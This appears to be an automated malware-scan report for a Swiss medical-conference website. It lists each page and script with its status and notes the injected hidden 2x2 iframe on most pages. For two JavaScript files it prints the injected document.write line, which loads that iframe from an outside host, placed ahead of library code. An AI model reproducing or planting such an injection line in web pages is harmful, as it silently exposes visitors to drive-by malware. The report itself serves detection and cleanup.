Scanned pages/files
Request | Server response | Status |
http://synapticdiseases.ch/ | 200 OK Content-Length: 3950 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?i=3353801 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?i=3353801> | ||
http://synapticdiseases.ch/meeting.html | 200 OK Content-Length: 3783 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?i=3353801 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?i=3353801> | ||
http://synapticdiseases.ch/index.html | 200 OK Content-Length: 3950 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?i=3353801 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?i=3353801> | ||
http://synapticdiseases.ch/program.html | 200 OK Content-Length: 2946 Content-Type: text/html | clean |
http://synapticdiseases.ch/js/prototype.js | 200 OK Content-Length: 163312 Content-Type: application/x-javascript | clean |
http://synapticdiseases.ch/js/scriptaculous.js?load=effects,builder | 200 OK Content-Length: 3087 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=3353801></iframe>');
var Scriptaculous = { Version: '1.9.0', require: function(libraryName) { try{ document.write('<script type="text/javascript" src="'+libraryName+'"><\/script>'); } catch(e) { var script = document.createElement('script'); script.type = 'text/j var js = /scriptaculous\.js(\?.*)?$/; $$('script[src]').findAll(function(s) { return s.src.match(js); }).each(function(s) { var path = s.src.replace(js, ''), includes = s.src.match(/\?.*load=([a-z,]*)/); (includes ? includes[1] : 'builder,effects,dragdrop,controls,slider,sound').split(',').each( function(include) { Scriptaculous.require(path+include+'.js') }); }); } }; Scriptaculous.load(); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?j=3353801 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=3353801> | ||
http://synapticdiseases.ch/js/lightbox.js | 200 OK Content-Length: 18668 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=3353801></iframe>');
LightboxOptions = Object.extend({ fileLoadingImage: 'images/loading.gif', fileBottomNavCloseImage: 'images/closelabel.gif', overlayOpacity: 0.8, animate: true, resizeSpeed: 7, borderSize: 10, labelImage: "Image", labelOf: "of" windowHeight = document.body.clientHeight; } if(yScroll < windowHeight){ pageHeight = windowHeight; } else { pageHeight = yScroll; } if(xScroll < windowWidth){ pageWidth = xScroll; } else { pageWidth = windowWidth; } return [pageWidth,pageHeight]; } } document.observe('dom:loaded', function () { new Lightbox(); }); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?j=3353801 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=3353801> | ||
http://synapticdiseases.ch/registration.html | 200 OK Content-Length: 2667 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?i=3353801 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?i=3353801> | ||
http://synapticdiseases.ch/call_for_abstract.html | 200 OK Content-Length: 3382 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?i=3353801 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?i=3353801> | ||
http://synapticdiseases.ch/js/prepopulate.js | 200 OK Content-Length: 2733 Content-Type: application/x-javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?j=3353801 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=3353801> | ||
http://synapticdiseases.ch/travel_and_accomodations.html | 200 OK Content-Length: 4692 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?i=3353801 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?i=3353801> | ||
http://synapticdiseases.ch/contact.html | 200 OK Content-Length: 3067 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?i=3353801 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?i=3353801> | ||
http://synapticdiseases.ch/test404page.js | 404 Not Found Content-Length: 1042 Content-Type: text/html | clean |
http://synapticdiseases.ch/img/programm_big.gif | 200 OK Content-Length: 278343 Content-Type: image/gif | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: synapticdiseases.ch
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Dec 2014 00:59:07 GMT
Accept-Ranges: bytes
ETag: "40198208-f6e-4de4ebbb72540"
Server: Apache
Content-Length: 3950
Content-Type: text/html
Last-Modified: Tue, 04 Jun 2013 07:07:25 GMT
...3950 bytes of data.
GET / HTTP/1.1
Host: synapticdiseases.ch
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Dec 2014 00:59:07 GMT
Accept-Ranges: bytes
ETag: "40198208-f6e-4de4ebbb72540"
Server: Apache
Content-Length: 3950
Content-Type: text/html
Last-Modified: Tue, 04 Jun 2013 07:07:25 GMT
...3950 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: synapticdiseases.ch
Referer: http://www.google.com/search?q=synapticdiseases.ch
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: synapticdiseases.ch
Referer: http://www.google.com/search?q=synapticdiseases.ch
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=synapticdiseases.ch
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://synapticdiseases.ch/
Result: synapticdiseases.ch is not infected or malware details are not published yet.
Result: synapticdiseases.ch is not infected or malware details are not published yet.